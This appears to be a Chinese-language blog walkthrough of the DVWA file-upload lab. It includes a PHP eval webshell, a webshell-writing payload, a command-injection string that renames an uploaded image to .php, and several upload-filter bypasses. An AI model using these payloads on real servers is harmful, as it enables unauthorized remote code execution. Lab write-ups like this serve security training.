DVWA篇_文件上传

目录

准备工作:

Low

Medium 

方法一:更改Content-Type类型

方法二:针对文件后缀过滤可以使用%00截断(适用于5.3.4以下的php版本) 

High

方法一:使用命令执行漏洞将文件类型改为php

方法二: 使用文件包含漏洞

 总结:


准备工作:

1.一句话木马:

<?php @eval($_POST['pass']);?>

2.蚁剑

3.Burp Suite

Low

分析代码可知low级别没有进行任何过滤,我们可以直接上传.php文件

使用蚁剑连接 

Medium 

分析代码可知medium级别对content-type以及文件大小进行了过滤,要求为image/jpeg或image/png,我们可以使用Burp Suite抓包改content-type或使用%00进行文件截断(适用于5.3.4以下的php版本)

方法一:更改Content-Type类型

原类型为application/octet-stream,这里我们改为image/jpeg

成功上传后使用蚁剑连接 

方法二:针对文件后缀过滤可以使用%00截断(适用于5.3.4以下的php版本) 

将filename改为test.php.jpeg,再使用%00截断,并进行URL编码

 

这里的content-type因为是.jpeg文件,所以自动修改为image/jpeg了

 再使用蚁剑连接

High

分析代码可知high级别使用白名单的方式进行文件类型过滤,只能是jpg、jpeg、png类型,我们可以使用windows的copy命令来制作图片木马

上传成功

因为上传的是静态文件, 这个时候我们使用蚁剑是连接不了的。有两种方法,第一种是使用命令执行漏洞将文件类型改为php,第二种是使用文件包含漏洞去执行我们上传的文件,执行后会自动生成一个php文件。

方法一:使用命令执行漏洞将文件类型改为php

输入以下代码

127.0.0.1|move ../../hackable/uploads/shell.png ../../hackable/uploads/shell.php

将图片木马文件类型改为php文件类型,成功后会显示以下结果

这时候我们使用蚁剑进行连接

方法二: 使用文件包含漏洞

此方法需要将一句话改为

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[pass])?>');?>

使木马有写功能 

先把security等级跳到low,然后复制刚刚上传的路径,之后利用文件执行漏洞去执行我们的图片木马文件。

可以看到文件执行成功

来到文件包含文件夹下,生成了shell.php文件

 

 使用蚁剑连接

 总结:

DVWA里的文件上传过滤可以抓包修改content-type,也可以使用%00截断,还使用copy命令制作图片木马,然后使用命令执行或者文件包含漏洞getshell

还可以使用前端JS绕过,.htaccess文件上传,竞争条件文件上传等方法

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
DVWA(Damn Vulnerable Web Application)是一个用于学习和测试Web应用程序安全的漏洞测试环境。文件包含(File Inclusion)是一种常见的Web应用程序漏洞,攻击者可以利用该漏洞来读取、执行或包含未经授权的文件。 在DVWA中,文件包含漏洞可以通过文件上传功能进行利用。以下是一般的利用步骤: 1. 打开DVWA:首先,您需要启动DVWA并访问其Web界面。 2. 注册和登录:如果您是第一次使用DVWA,您需要注册一个新用户并登录到系统中。 3. 设置安全级别:DVWA提供了不同的安全级别,您可以选择适合您的安全级别。对于文件包含漏洞的利用,建议将安全级别设置为"low"。 4. 寻找文件上传功能:在DVWAWeb界面中,寻找与文件上传相关的功能或页面。通常,这些功能或页面会要求用户上传文件。 5. 构造恶意文件:准备一个恶意文件,该文件可能包含一些恶意代码或命令,以便在服务器上执行。 6. 上传恶意文件:使用文件上传功能将恶意文件上传到服务器。确保您选择了一个可以执行上传文件的目录。 7. 利用文件包含漏洞:通过构造特定的URL,尝试包含刚刚上传的恶意文件。在URL中,将文件名参数设置为您上传的文件名。 8. 执行恶意代码:如果文件包含漏洞存在,并且服务器对上传的文件进行了执行,那么恶意代码将被执行。 请注意,上述步骤仅用于教育和测试目的。在实际环境中,利用文件包含漏洞是非法的,并且可能导致未经授权的访问和攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值